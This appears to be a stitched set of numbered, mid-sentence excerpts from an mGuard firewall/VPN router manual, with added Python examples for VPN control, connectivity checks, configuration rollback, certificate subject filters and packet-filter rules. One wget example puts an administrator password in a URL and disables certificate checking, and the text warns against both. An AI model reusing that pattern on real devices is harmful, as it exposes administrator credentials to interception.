Ethernet Protocol: Specifies that only data packets of the specified Ethernet protocol may pass through. Possible entries: ARP, IPv4, any. Other entries must be in hexadecimal format (up to 4 digits): the ID of the relevant protocol in the Ethernet header is entered here. It can be found in the publication of the relevant standard.
IP Protocol: All, TCP, UDP, ICMP, ESP. Specifies that only data packets of the selected IP protocol may pass through. When set to All, no filtering is applied according to the IP protocol.
From IP: Specifies that only data packets from a specified IP address may pass throug
276. ...ing VPN connections, changing (editing) the VPN connection or connection group properties, and deleting connections.
[Screenshot of IPsec VPN >> Connections: a table of connections (e.g. "Berlin", "Blomberg") with their state: Started, Disabled, Stopped.]
Defining a new VPN connection (VPN connection channels): In the connections table, click on Edit to the right of the unnamed entry under Name. If the unnamed entry cannot be seen, open another row in the table.
Editing a VPN connection (VPN connection channels): Click on Edit to the right of the relevant entry.
URL for starting/stopping/querying the status of a VPN connection: The following URL can be used to start and stop VPN connections or query their connection status, independently of their Initial Mode setting:
https://server/nph-vpn.cgi?name=verbindung&cmd=(up|down|status)
Example: wget --no-check-certificate "https://admin:mGuard@192.168.1.1/nph-vpn.cgi?name=Athen&cmd=up"
The --no-check-certificate option ensures that the HTTPS certificate on the mGuard does not undergo any further checking. Note that this also removes the protection against a man-in-the-middle presenting a forged certificate, who would then receive the administrator password contained in the URL; where possible, supply the mGuard's certificate (or the CA that issued it) to wget with the --ca-certificate option instead. It may also be necessary to encode the password for the URL if it contains special characters. A command like this relates to all connection channels that are grouped together under the respective name (in this example Athen). This is the name that is listed under IPsec VPN >> Connections >> Edit >> General as "A descriptive name for the connection". In the event
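The nph-vpn.cgi request from the example above, built with the password percent-encoded as the manual advises and sent with certificate verification instead of wget's --no-check-certificate, as an added example (not code from the mGuard manual or from the product). The host name, user name and CA file path are assumptions, and the function names are this example's own; nothing contacts a device unless control_vpn() is actually called.

```python
"""Added example, not code from the mGuard manual: building the
nph-vpn.cgi control URL with the password percent-encoded, and sending
the command with TLS certificate verification instead of disabling it.
Host, user and CA file path are assumptions."""
import base64
import ssl
import urllib.request
from typing import Optional
from urllib.parse import quote, urlencode

COMMANDS = ("up", "down", "status")


def vpn_control_url(host: str, name: str, cmd: str, user: str, password: str) -> str:
    """https://user:password@host/nph-vpn.cgi?name=...&cmd=up|down|status
    Special characters in user, password and connection name are
    percent-encoded so they cannot be read as URL delimiters."""
    if cmd not in COMMANDS:
        raise ValueError("cmd must be one of up, down, status")
    credentials = f"{quote(user, safe='')}:{quote(password, safe='')}"
    return f"https://{credentials}@{host}/nph-vpn.cgi?{urlencode({'name': name, 'cmd': cmd})}"


def verifying_context(cafile: Optional[str]) -> ssl.SSLContext:
    """TLS context that trusts only the given CA file (e.g. the mGuard's own
    HTTPS certificate exported from the device, or the CA that issued it)
    and keeps host name checking on.  None falls back to the system store,
    which will normally not contain a device certificate."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def control_vpn(host: str, name: str, cmd: str, user: str, password: str,
                cafile: str, timeout: float = 10.0) -> str:
    """Issues the command with HTTP basic authentication in a header, so the
    password does not end up in shell history or proxy logs as part of the URL."""
    if cmd not in COMMANDS:
        raise ValueError("cmd must be one of up, down, status")
    url = f"https://{host}/nph-vpn.cgi?{urlencode({'name': name, 'cmd': cmd})}"
    request = urllib.request.Request(url)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    request.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(request, context=verifying_context(cafile), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")
```

The CA file is the piece a scripted deployment usually lacks: export the device's HTTPS certificate once over a trusted connection and ship it with the script, then every later call fails loudly instead of silently talking to an impostor.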
277. ...ing the X.509 certificates shown by these VPN partners. For this to happen, the relevant X.509 certificate must be set on the mGuard. This is known as the Remote CA Certificate. If a remote certificate is renewed, for a brief period only one of the mGuard devices will have the new certificate. We therefore recommend authenticating the VPN partners using CA certificates instead of remote certificates in VPN redundancy.
Redundancy
Adding a new CA certificate to identify VPN partners: The mGuard can be set to authenticate VPN partners using CA certificates (see CA Certificates on page 199 and Authentication on page 269). To do this, select "Signed by any trusted CA" under IPsec VPN >> Connections >> Edit >> Authentication, Remote CA Certificate. With this setting a new CA certificate can be added without affecting the established VPN connections. However, the new CA certificates are used immediately. The X.509 certificate used by the VPN partner to authenticate itself to the mGuard can then be replaced with minimal interruption. The only requirement is ensuring that the new CA certificate is available first. The mGuard can be set to check the validity period of the certificates provided by the VPN partner (see Certificate settings on page 195). In this case new trusted CA certificates must be added to the mGuard configuration. These certif
278. ...innominate.com.
Archived log entries are not affected by a restart. They can be downloaded as part of the support snapshot (Support >> Advanced menu item, Snapshot tab page). A snapshot provides your dealer's support team with additional options for more efficient troubleshooting than would be possible without archiving.
Archive diagnostic messages only upon failure: Yes/No. Only visible if archiving is enabled. If only log entries generated for failed connection attempts are to be archived, set this option to Yes. If set to No, all log entries will be archived.

TCP Encapsulation
This function is used to encapsulate data packets to be transmitted via a VPN connection in TCP packets. Without this encapsulation, it is possible under certain circumstances that important data packets belonging to the VPN connection are not correctly transmitted because of interconnected NAT routers, firewalls or proxy servers. Firewalls, for example, may be set up to prevent any data packets of the UDP protocol from passing through, or incorrectly implemented NAT routers may not manage the port numbers correctly for UDP packets. TCP encapsulation avoids these problems because the packets belonging to the relevant VPN connection are encapsulated in TCP packets, i.e. they are hidden so that only TCP packets appear for the network infrastructure
279. ...iod after which membership to the multicast group expires, in seconds.
IGMP Query: IGMP is used to join and leave a multicast group. Here the IGMP version can be selected: V1 or V2 (V3 is not supported).
IGMP Query Interval: Interval in which IGMP queries are generated, in seconds.
Multicast Groups: Displays the multicast groups. The display contains all static entries and the dynamic entries which are discovered by IGMP snooping.

6.2.3 Ethernet
Only available with the mGuard rs4000 3G.
[Screenshot of Network >> Ethernet, Ethernet tab page. ARP Timeout: 30. MTU Settings: MTU of the internal interface 1500, MTU of the internal interface for VLAN 1500, MTU of the external interface 1500, MTU of the external interface for VLAN 1500, MTU of the DMZ interface 1500, MTU of the Management Interface 1500, MTU of the Management Interface for VLAN 1500.]
Network >> Ethernet >> Ethernet
ARP Timeout: Service life in seconds of entries in the ARP table. MAC and IP addresses are assigned to each other in the ARP table.
MTU Settings, MTU of the interface: The maximum transfer unit (MTU) defines the maximum IP packet length that may be used for the relevant interface. For a VLAN interface: as VLAN packets contain 4 bytes more than those without VLAN, certain drivers may have problems processing these larger packets. Such pro
280. ...ion. With passive FTP, the client establishes this additional connection to the server for data transmission. FTP must be set to Yes (default) so that these additional connections can pass through the firewall.
IRC: Yes/No. Similar to FTP: for IRC (chat over the Internet) to work properly, incoming connections must be allowed following active connection establishment. IRC must be set to Yes (default) in order for these connections to pass through the firewall.
Network Security >> Packet Filter >> Advanced (fields on this tab page: PPTP, H.323, SIP, OPC classic, Sanity check for OPC classic)
PPTP: Yes/No, default No. Must be set to Yes if VPN connections are to be established using PPTP from local computers to external computers without the assistance of the mGuard. Must be set to Yes if GRE packets are to be forwarded from the internal area to the external area.
H.323: Yes/No, default No. Protocol used to establish communication sessions between two or more devices. Used for audio-visual transmission. This protocol is older than SIP.
SIP: Yes/No, default No. SIP (Session Initiation Protocol) is used to establish communication sessions between two or more devices. Often used in IP telephony. When set to Yes, it is possible for the mGuard to track the SIP traffic and add any necessary firewall rules dynamically if further channels are
281. ...ion attempt is successful.
Authentication >> RADIUS Servers
This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000.
RADIUS timeout: Specifies the time in seconds the mGuard waits for a response from the RADIUS server. Default: 3 seconds.
RADIUS retries: Specifies how often requests to the RADIUS server are repeated after the RADIUS timeout has elapsed. Default: 3.
RADIUS NAS Identifier: A NAS ID (NAS identifier) is sent with every RADIUS request, except when the field remains empty. All common characters on the keyboard except for umlauts can be used as the NAS ID. The NAS ID is a RADIUS attribute that can be used by the client to be identified by the RADIUS server. The NAS ID can be used instead of an IP address to identify the client. It must be unique within the range of the RADIUS server.
Server: Name of the RADIUS server or its IP address. We recommend entering IP addresses as servers instead of names where possible. Otherwise the mGuard must first resolve the names before it can send authentication queries to the RADIUS server. This takes time when logging in. Also, it may not always be possible to perform authentication if name resolution fails, e.g. because the DNS is not available or the name was deleted from the DNS.
Authentication >> RADIUS Servers
282. ...ion of the last check: Duration of the check in hours and minutes. Only displayed if a check has been carried out.
Start of the current check: Only displayed if a check has been carried out.
Progress of the current check: Only displayed if a check is currently active.
Status: Status of the integrity check.
Starts at: Start time.
Progress: Progress as a percentage and the number of checked files.
Number of detected deviations: Number of differences detected.
Estimated completion time: Estimated completion time for the check.
Last check was OK (no deviations found) / Deviations detected during the last check: The exact deviations are listed in the check report. The check report is displayed here. It can be downloaded by clicking on "Download the report". Click on "Validate the report" to check whether the report is unchanged from the definition in the mGuard, according to the signature and certificate.
Servername/networkdrive: the checked share.
Weekday month day HH:MM:SS UTC: The local time may differ from this time. Example: the standard time in Germany is Central European Time (CET), which is UTC plus one hour. Central European Summer Time applies in summer, which is UTC plus two hours.
Buttons: Start an integrity check right now; Re-build the integrity database; Interrupt the current process.
Start an integrity check right now: Click on "Start a check" to start the integrity check. Only displayed if a
283. ...ional protection. If there are special requirements in your operating environment, this value can be increased. Connections established from the mGuard are also counted. This value must therefore not be set too low, as this would otherwise cause malfunctions.
Allow TCP connections upon SYN only: Yes/No, default No. SYN is a special data packet used in TCP/IP connection establishment that marks the beginning of the connection establishment process. No (default): the mGuard also allows connections where the beginning has not been registered. This means that the mGuard can perform a restart while a connection is present without interrupting the connection. Yes: the mGuard must have registered the SYN packet of an existing connection; otherwise the connection is aborted. If the mGuard performs a restart while a connection is present, this connection is interrupted. Attacks on and the hijacking of existing connections are thus prevented: with No, a packet that arrives in the middle of a connection the mGuard never saw start is enough to create state for it, which is exactly what an attacker injecting spoofed segments needs.
Timeout for established TCP connections: If a TCP connection is not used during the time period specified here, the connection data is deleted. A connection translated by NAT (not 1:1 NAT) must then be re-established. If Yes is set under Allow TCP connections upon SYN only, all expired connections must be re-established. The default setting is 432000 seconds (5 days).
Network Security >> Packet Filter >> Advanced
Timeout for closed TCP connections: The timeout blocks a TCP port-to-port connection for an ex
284. ...ions allow you to reduce the size of the UDP packets generated by IPsec to traverse such routers.
IKE Fragmentation: Yes/No. IKE Main Mode with X.509 certificates usually generates large UDP packets. With this option enabled, IKE Main Mode packets will be fragmented within the IKE protocol itself, which avoids large UDP packets.
IPsec MTU (default is 16260): The internal IPsec MTU is usually set to a large value like 16260 to avoid fragmentation of IP packets within IPsec. When IPsec has to traverse NAT routers, encrypted IP packets will be transferred via UDP. By reducing the IPsec MTU, the IP packets will be fragmented before they are encapsulated in UDP, which avoids large UDP packets. A recommended value in such situations is 1414 or smaller. Note: This applies to VPN tunnels only.
IPsec VPN >> Global >> Options
Allow packet forwarding between VPN connections: This option should only be set to Yes on an mGuard communicating between two different VPN partners. To enable communication between two VPN partners, the local network of the communicating mGuard must be configured so that the remote networks containing the VPN partners are included. The opposite setup (local and remote netwo
Archive diagnostic messages for VPN connections: The CMD contact is only available on the mGuard rs4000/rs2000 and mGuard industrial rs.
285. ...ironments (e.g. when the mGuard is operated by means of a machine controller via the CMD contact; mGuard rs4000/rs2000 3G and mGuard industrial rs only), the option for a user to view the mGuard log file via the web-based user interface of the mGuard may not be available at all. When used remotely, it is possible that a VPN connection error can only be diagnosed after the mGuard is temporarily disconnected from its power source, which causes all the log entries to be deleted. The relevant log entries of the mGuard that could be useful may be deleted because the mGuard regularly deletes older log entries on account of its limited memory space. If an mGuard is being used as the central VPN partner (e.g. in a remote maintenance center) as the gateway for the VPN connections of numerous machines, the messages regarding activity on the various VPN connections are logged in the same data stream. The resulting volume of logging makes it time-consuming to find the information relevant to one error.
After archiving is enabled, relevant log entries about the operations involved in establishing VPN connections are archived in the non-volatile memory of the mGuard if the connections are established as follows: via the CMD contact; via the CGI interface (nph-vpn.cgi) using the synup command (see Application Note "How to use the CGI Interface"). Application notes are available in the download area at www.
286. ...is redundancy pair.
Secondary targets for ICMP echo requests: Used only if the check failed.
[Screenshot of Redundancy >> Firewall Redundancy >> Connectivity Checks, showing the primary and secondary ICMP echo request targets for the internal and external interface, e.g. 192.168.1.1 and 192.168.1.31.]
Redundancy >> Firewall Redundancy >> Connectivity Checks, External interface
Kind of check: Specifies whether a connectivity check is performed on the external interface and, if so, how. If "at least one target must respond" is selected, it does not matter whether the ICMP echo request is answered by the primary or the secondary target. The request is only sent to the secondary target if the primary target did not offer a suitable answer. In this way configurations can be supported where the devices are only provided with ICMP echo requests if required. If "all targets of one set must respond" is selected, then both targets must answer. If no secondary target is specified, then only the primary target must answer. If "Ethernet link detection only" is selected, then only the state of the Ethernet connection is checked.
Primary targets for ICMP echo requests: This is an unsorted list of IP addresses used as targets for ICMP echo requests. We recommend using the IP addresses of routers, especially the IP addresses of default gateways, or the actual IP address of the other mGuard. Default: 10.0.0.30, 10.0.0.31 for new addresses. Each set of targets for sta
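The three "Kind of check" modes described above, evaluated against a probe function so that the decision logic runs offline, as an added example (not code from the mGuard manual or from the product). A probe returning True stands for an answered ICMP echo request, the recording probe over a constructed reachability table is this example's own device for showing which targets were actually asked, and the target addresses are the manual's defaults; the rule that no ICMP mode can pass while the Ethernet link is down is an assumption.

```python
"""Added example, not code from the mGuard manual: evaluation of the three
connectivity-check modes over a pluggable probe.  probe(ip) -> True stands
for an answered ICMP echo request (assumption); the reachability table in
RecordingProbe is constructed test data."""
from typing import Callable, List, Set

Probe = Callable[[str], bool]


def check_interface(kind: str, primary: List[str], secondary: List[str],
                    probe: Probe, link_up: bool = True) -> bool:
    """True if the interface passes the connectivity check of the given kind."""
    if kind == "Ethernet link detection only":
        return link_up
    if not link_up:            # assumption: no echo reply can arrive over a down link
        return False
    if kind == "at least one target must respond":
        # the secondary targets are only asked when no primary target answered
        if any(probe(ip) for ip in primary):
            return True
        return any(probe(ip) for ip in secondary)
    if kind == "all targets of one set must respond":
        # both sets must answer; without secondary targets only the primary set counts
        sets = [primary] + ([secondary] if secondary else [])
        return all(all(probe(ip) for ip in s) for s in sets)
    raise ValueError(f"unknown kind of check: {kind}")


class RecordingProbe:
    """Probe over a constructed reachability table that records which targets were asked."""

    def __init__(self, reachable: Set[str]):
        self.reachable = reachable
        self.asked: List[str] = []

    def __call__(self, ip: str) -> bool:
        self.asked.append(ip)
        return ip in self.reachable
```

The recorded probe order is the practical takeaway: in "at least one target must respond" mode a secondary target such as the other mGuard is never contacted while a prim­ary target answers, so its reachability is not being monitored at all in normal operation.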
287. ...is found to be faulty according to the checking procedure described above.
When the mGuard makes subsequent attempts to retrieve a new configuration profile (periodically, after the time defined in the Pull Schedule field and Time Schedule has elapsed), it will only accept the profile subject to the following selection criterion: the configuration profile provided must differ from the configuration profile previously identified as faulty for the mGuard and which resulted in the rollback. The mGuard checks the MD5 sum stored for the old, faulty and rejected configuration against the MD5 sum of the new configuration profile offered. (This comparison only detects a changed profile; it is not an integrity protection against a manipulated profile.)
If this selection criterion is met, i.e. a newer configuration profile is offered, the mGuard retrieves this configuration profile, applies it and checks it according to the procedure described above. It also disables the configuration profile by means of rollback if the check is unsuccessful.
If the selection criterion is not met, i.e. the same configuration profile is being offered, the selection criterion remains in force for all further cyclic requests for the period specified in the Number of times field. If the specified number of times elapses without a change of the configuration profile on the configuration server, the mGuard applies the unchanged new (faulty) configuration profile again, despite it being faulty. This is to rule out the possibility that external factors (e.g.
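The selection criterion described above as a small state machine, added here as an example (not code from the mGuard manual or from the product). The checking procedure itself is a callback supplied by the caller, the class and method names are this example's own, and the profiles in the usage note are constructed; what the code reproduces is the described behaviour: the MD5 sum of a rolled-back profile is remembered, an offered profile with the same sum is skipped for "Number of times" further pulls, and after that the unchanged profile is tried again.

```python
"""Added example, not code from the mGuard manual: the post-rollback
selection criterion for configuration pull.  is_valid() stands in for the
checking procedure (assumption); MD5 is used only to detect a changed
profile, as in the manual, not to authenticate it."""
import hashlib
from typing import Callable, Optional


class PullClient:
    def __init__(self, is_valid: Callable[[bytes], bool], number_of_times: int):
        self.is_valid = is_valid                     # the checking procedure (assumed callback)
        self.number_of_times = number_of_times       # the "Number of times" field
        self.applied: Optional[bytes] = None         # currently active profile
        self.rejected_md5: Optional[str] = None      # MD5 sum of the profile rolled back
        self.remaining = 0                           # pulls left for which the criterion holds

    @staticmethod
    def md5(profile: bytes) -> str:
        return hashlib.md5(profile).hexdigest()

    def pull(self, offered: bytes) -> str:
        """One pull cycle; returns what happened."""
        if self.rejected_md5 is not None and self.md5(offered) == self.rejected_md5:
            if self.remaining > 0:
                self.remaining -= 1
                return "skipped: same profile as the one rolled back"
            # counter elapsed: apply the unchanged profile again despite the earlier failure
            self.rejected_md5 = None
            return self._apply(offered)
        return self._apply(offered)

    def _apply(self, profile: bytes) -> str:
        if self.is_valid(profile):
            self.applied = profile
            self.rejected_md5 = None
            return "applied"
        # rollback: the previous configuration stays active, the faulty one is remembered
        self.rejected_md5 = self.md5(profile)
        self.remaining = self.number_of_times
        return "rolled back"
```

Usage: with is_valid=lambda p: b"broken" not in p and number_of_times=2, pulling a broken profile after a good one returns "rolled back", the next two pulls of the same bytes are skipped, the third is tried again (and rolled back again), and a differing profile is applied at once.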
288. ...it string: d dATH OK
COM Server: Type: RAW server. Local port: 3001. Serial parameters: 1 stopbit, no parity. Please note: On some platforms the serial port is not accessible. For the COM Server baudrate and handshake, the Serial Console settings are used. The RFC 2217 Server is initialized with the same serial settings as the RAW Server.
COM Server Allowed Networks: [Screenshot of the firewall table with the example rule From IP 0.0.0.0/0, Interface External, Action Accept, Log Yes.] A RAW or RFC 2217 COM server carries no authentication of its own, so this rule table is the only access control for the serial port; an Accept rule for 0.0.0.0/0 on External, as in the screenshot, exposes the attached serial device to every host that can reach the WAN address.
Options for using the serial interface: The serial interface can be used alternatively as follows:
As a primary external interface, if the network mode is set to Modem under Network >> Interfaces on the General tab page (see Network >> Interfaces on page 105 and on page 106). In this case data traffic is not processed via the WAN port (Ethernet interface) but via the serial interface.
As a secondary external interface, if Secondary External Interface is activated and Modem is selected under Network >> Interfaces on the General tab page (see Network >> Interfaces on page 105 and on page 106). In this case data traffic is processed permanently or temporarily via the serial interface.
For dialing in to the LAN or for configuration purposes (see also Dial-in on page 136). The following options are available: A modem is connected to the serial interface of the mGuard. This modem is connec
289. ithin the permissible range.

Management >> Service I/O >> Alarm output

Connection state of the internal modem: Only if an internal modem is available and switched on (mGuard rs4000/rs2000 3G, mGuard industrial rs with internal analog modem or ISDN modem). If set to Ignore, the connection status of the internal modem does not influence the alarm output. If set to Supervise, the alarm output is opened if the internal modem does not have a connection.

Connectivity state of redundancy: Only if the Redundancy function is used (see Section 16). If set to Ignore, the connectivity check does not influence the alarm output. If set to Supervise, the alarm output is opened if the connectivity check fails. This applies regardless of whether the mGuard is active or in standby mode.

4.8 Management >> Restart

4.8.1 Restart

Management >> Restart >> Restart

Note: please allow the device approximately 40 seconds to reboot.

Restart: Restarts the mGuard. This has the same effect as a temporary interruption of the power supply, whereby the mGuard is switched off and on again. A restart (reboot) is necessary in the event of an error. It may also be necessary after a software update.

5 Blade Control menu

This menu is only availab
290. ividuals.

An asterisk (*) in the X.509 subject field specifies that all subject entries in the certificate shown by the SSH client are permitted. It is then no longer necessary to identify or define the subject in the certificate.

Limited access to certain subjects (i.e. individuals) or to subjects that have certain attributes:

In the certificate, the certificate owner is specified in the Subject field. The entry is comprised of several attributes. These attributes are either expressed as an object identifier (a dotted numeric OID) or, more commonly, as an abbreviation with a corresponding value.
Example: CN=John Smith, O=Smith and Co, C=US

If certain subject attributes must have very specific values for the SSH client to be accepted by the mGuard, these must be specified accordingly. The values of the other, freely selectable attributes are entered using the asterisk wildcard.
Example: CN=*, O=*, C=US (with or without spaces between attributes)

In this example the attribute C=US must be present in the certificate under Subject. Only then does the mGuard accept the certificate owner (Subject) as a communication partner. The other attributes in the certificates to be filtered can have any value.

If a subject filter is set, the number, but not the order, of the specified attributes must correspond to that of the certificates for which the filter is to be used. Please note that the f
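A matcher for the subject filter rules described above, as an added Python example (illustrative code written for this page, not the mGuard's own implementation). It splits the subject and the filter at commas, which is a simplification: a real X.509 distinguished name may contain escaped commas, and the helper parse_subject introduced here does not handle them. It enforces the two rules from the text: a wildcard value matches anything, and the number of attributes must correspond while their order may differ.

```python
def parse_subject(subject: str) -> list:
    """Split 'CN=John Smith, O=Smith and Co, C=US' into [(attribute, value), ...].
    Simplification: values containing escaped commas are not handled."""
    pairs = []
    for item in subject.split(","):
        item = item.strip()
        if not item:
            continue
        attribute, _, value = item.partition("=")
        pairs.append((attribute.strip(), value.strip()))
    return pairs


def subject_matches(subject_filter: str, certificate_subject: str) -> bool:
    """Apply a subject filter in the form described above to a certificate's Subject."""
    if subject_filter.strip() == "*":
        return True  # a lone asterisk permits every subject
    wanted = parse_subject(subject_filter)
    present = parse_subject(certificate_subject)
    # The number of attributes must correspond, but not their order.
    if len(wanted) != len(present):
        return False
    remaining = list(present)
    for attribute, value in wanted:
        for index, (attr, val) in enumerate(remaining):
            if attr == attribute and (value == "*" or val == value):
                del remaining[index]  # each certificate attribute is consumed once
                break
        else:
            return False  # no unmatched attribute satisfies this filter entry
    return True


if __name__ == "__main__":
    # Constructed subjects illustrating the examples from the text.
    print(subject_matches("CN=*, O=*, C=US", "CN=John Smith, O=Smith and Co, C=US"))
    print(subject_matches("CN=*, O=*, C=US", "CN=John Smith, O=Smith and Co, C=DE"))
```

Because the attribute count must match, a filter such as CN=*, O=*, C=US does not accept a certificate whose subject carries an additional OU attribute; the filter has to list every attribute the certificates contain, using the wildcard for those whose value is irrelevant.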
291. l Resolving of Hostnames

Network >> DNS >> DNS server

DNS: If the mGuard is to initiate a connection to a partner on its own (e.g. to a VPN gateway or NTP server) and the partner is specified in the form of a host name (e.g. www.example.com), the mGuard must determine which IP address belongs to the host name. To do this it contacts a domain name server (DNS) and queries the corresponding IP address there. The IP address determined for the host name is stored in the cache so that it can be found directly, i.e. more quickly, for subsequent resolutions of the same host name.

With the Local Resolving of Hostnames function, the mGuard can also be configured to respond itself to DNS requests for locally used host names by consulting an internal, previously configured directory.

The locally connected clients can be configured, manually or via DHCP, so that the local address of the mGuard is used as the address of the DNS server. If the mGuard is operated in Stealth mode, the management IP address of the mGuard (if one is configured) must be used for the clients, or the IP address 1.1.1.1 must be entered as the local address of the mGuard. Note that 1.1.1.1 is also a publicly routed address: while the mGuard in Stealth mode answers on it locally, clients behind the mGuard cannot reach a public DNS service at that address.

DNS cache state: Status of the host name resolution.

Used DNS servers: DNS servers that were queried for IP addresses.

Name servers to query:
- DNS Root Name Servers: Requests are sent to the root name servers on the Internet, whose IP addresses are stored on the mGuard. These addresses rarely change
292. l and External 2 interfaces. These interfaces are only available on mGuard models that have a serial interface with external access.

Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.

From IP / To IP: 0.0.0.0/0 means all IP addresses. To specify an address range, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).

Network Security >> Packet Filter >> Incoming Rules

From Port / To Port: Only evaluated for the TCP and UDP protocols. any refers to any port. startport:endport (e.g. 110:120) refers to a port range. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3, or pop3 for 110).

Action:
- Accept means that the data packets may pass through.
- Reject means that the data packets are sent back and the sender is informed of their rejection. In Stealth mode, Reject has the same effect as Drop.
- Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.
- Name of rule sets, if defined: When a name is specified for rule sets, the firewall rules saved under this name take effect (see Rule Records tab page).

Comment: Freely selectable comment for this rule.

Log: For each indiv
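A rule evaluator for the Incoming Rules fields described above, as an added Python example (illustrative code written for this page, not the mGuard's own firewall). It parses the port notations (any, startport:endport, a number, or a service name from a constructed SERVICE_PORTS table), matches addresses in CIDR notation, evaluates ports only for TCP and UDP, and maps Reject to Drop in Stealth mode. The rule set and the packets are constructed, and the policy applied when no rule matches (Drop) is an assumption of this example.

```python
import ipaddress

# Constructed subset of service names; the text mentions pop3 as an example.
SERVICE_PORTS = {"pop3": 110, "ssh": 22, "https": 443}


def parse_port_spec(spec: str):
    """'any' -> whole range, 'start:end' -> range, number or service name -> single port."""
    spec = spec.strip().lower()
    if spec == "any":
        return (0, 65535)
    if ":" in spec:
        lo, hi = spec.split(":", 1)
        return (int(lo), int(hi))
    if spec.isdigit():
        port = int(spec)
        return (port, port)
    port = SERVICE_PORTS[spec]
    return (port, port)


def rule_matches(rule: dict, pkt: dict) -> bool:
    """Does one rule apply to one packet?"""
    if rule["protocol"] != "All" and rule["protocol"] != pkt["protocol"]:
        return False
    if ipaddress.ip_address(pkt["src"]) not in ipaddress.ip_network(rule["from_ip"]):
        return False
    if ipaddress.ip_address(pkt["dst"]) not in ipaddress.ip_network(rule["to_ip"]):
        return False
    # Ports are only evaluated for TCP and UDP.
    if pkt["protocol"] in ("TCP", "UDP"):
        lo, hi = parse_port_spec(rule["from_port"])
        if not lo <= pkt["sport"] <= hi:
            return False
        lo, hi = parse_port_spec(rule["to_port"])
        if not lo <= pkt["dport"] <= hi:
            return False
    return True


def evaluate(rules: list, pkt: dict, stealth: bool = False) -> str:
    """First matching rule wins. Assumed default when nothing matches: Drop."""
    for rule in rules:
        if rule_matches(rule, pkt):
            action = rule["action"]
            # In Stealth mode Reject behaves like Drop: nothing is sent back.
            if stealth and action == "Reject":
                return "Drop"
            return action
    return "Drop"


# Constructed Incoming Rules: accept POP3 from anywhere, reject 110:120 from 10/8, accept ICMP.
RULES = [
    {"protocol": "TCP", "from_ip": "0.0.0.0/0", "to_ip": "192.168.1.0/24",
     "from_port": "any", "to_port": "pop3", "action": "Accept"},
    {"protocol": "TCP", "from_ip": "10.0.0.0/8", "to_ip": "192.168.1.0/24",
     "from_port": "any", "to_port": "110:120", "action": "Reject"},
    {"protocol": "ICMP", "from_ip": "0.0.0.0/0", "to_ip": "0.0.0.0/0",
     "from_port": "any", "to_port": "any", "action": "Accept"},
]

if __name__ == "__main__":
    pkt = {"protocol": "TCP", "src": "10.1.2.3", "dst": "192.168.1.10", "sport": 40000, "dport": 115}
    print(evaluate(RULES, pkt), evaluate(RULES, pkt, stealth=True))
```

The same packet that is rejected in Router mode is silently dropped in Stealth mode, which is the behaviour a scanner would observe: a closed-port response from the first and no response at all from the second.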
293. lability check at the external interface: Only available when Dedicated Interface is selected. When Yes is selected, no presence notifications (CARP) are transmitted or received via the external interface. This can make sense in some scenarios for protection against external attacks.

13.1.2 Connectivity Checks

Targets can be configured for the internal and external interface in the connectivity check. It is important that these targets are actually connected to the specified interface: an ICMP echo reply cannot be received by the external interface when the corresponding target is connected to the internal interface, and vice versa. When the static routes are changed, the targets may easily no longer be checked properly.

Redundancy >> Firewall Redundancy >> Redundancy >> Connectivity Checks

External interface:
- Kind of check: at least one target must respond.
- Primary targets for ICMP echo requests: recommended are the IPs of routers, in particular of a default gateway, or the real IP of the other mGuard of this redundancy pair.
- Secondary targets for ICMP echo requests: used only if the check failed.

Internal interface (screenshot example targets 172.16.66.18 and 10.0.0.31):
- Kind of check: at least one target must respond.
- Primary targets for ICMP echo requests: recommended are the IPs of routers, in particular of a default gateway, or the real IP of the other mGuard of th
294. le SEC Stick remote access: Set this option to Yes to enable SEC Stick remote access.

Remote SEC Stick TCP Port: Default 22002. If this port number is changed, the new port number only applies for access via the External, External 2 or VPN interface. Port number 22002 still applies for internal access.

SEC Stick >> Global >> Access

Delay between requests for a sign of life: Default 120 seconds. Values from 0 to 3600 seconds can be set. Positive values indicate that the mGuard sends a query to the partner within the encrypted SSH connection to find out whether it can still be reached. The request is sent if no activity was detected from the partner for the specified number of seconds (e.g. due to network traffic within the encrypted connection). The value entered relates to the functionality of the encrypted SSH connection: as long as the functions are working properly, the SSH connection is not terminated by the mGuard as a result of this setting, even when the user does not perform any actions during this time. As the number of simultaneously open sessions is limited (see Maximum number of cumulative concurrent sessions for all users), it is important to terminate sessions that have expired. Therefore the request for a sign of life is preset to 120 seconds (in the case of Version 7.4

Maximum number of missing signs of life:
295. le on the mGuard blade controller. For reasons of compatibility, always use the latest blade slide-in module as controller.

5.1 Blade Control >> Overview

[Screenshot: Blade Control >> Overview with Rack ID 0, power supply P1/P2 status, and slots 01 to 06 listing device type (blade, blade XL), serial number, software version 7.4.1 and profile default; slot 06 Unknown/Absent.]

Blade Control >> Overview

Rack ID: The ID of the rack where the mGuard is located. This value can be configured for all blade devices on the controller.

Power supply P1, P2: Status of power supply units P1 and P2: OK, Absent, Defect, Fatal error.

Blade: Number of the slot where the mGuard blade is installed.

Device: Device name, e.g. blade or blade XL.

Status:
- Online: the device in the slot is operating correctly.
- Present: the device is present but not yet ready, e.g. because it is just starting up.
- Absent: no device found in the slot.

WAN: Status of the WAN port.

LAN: Status of the LAN port.

Serial: Serial number of the mGuard.

Version: Software version of the mGuard.

B: Backup: automatic configuration backup on the controller is activated/deactivated for this slot.

R: Restore: automatic configuration restoration after replacing the mGuard is activated/deactivated for this slot.
296. license must be installed first. The device must be restarted in order to use the installed license.

IPsec VPN menu

Masquerade: Can only be used for the Tunnel VPN type.

Example: A control center has one VPN tunnel each for a large number of branches. A local network with numerous computers is installed in each branch, and these computers are connected to the control center via the relevant VPN tunnel. In this case the address range could be too small to include all the computers at the various VPN tunnel ends. Masquerading solves this problem: by means of masquerading, the computers connected in the network of a branch appear under a single IP address to the VPN gateway of the control center. In addition, this enables the local networks in the various branches to all use the same network address locally. Only the branch can establish VPN connections to the control center.

Network address for masquerading: Specify the IP address range for which masquerading is used. The sender address in data packets sent by a computer via the VPN connection is only replaced by the address specified in the Local field (see above) if this computer has an IP address from this range. The address specified in the Local field must have the subnet mask /32 to ensure that it designates only one IP address.

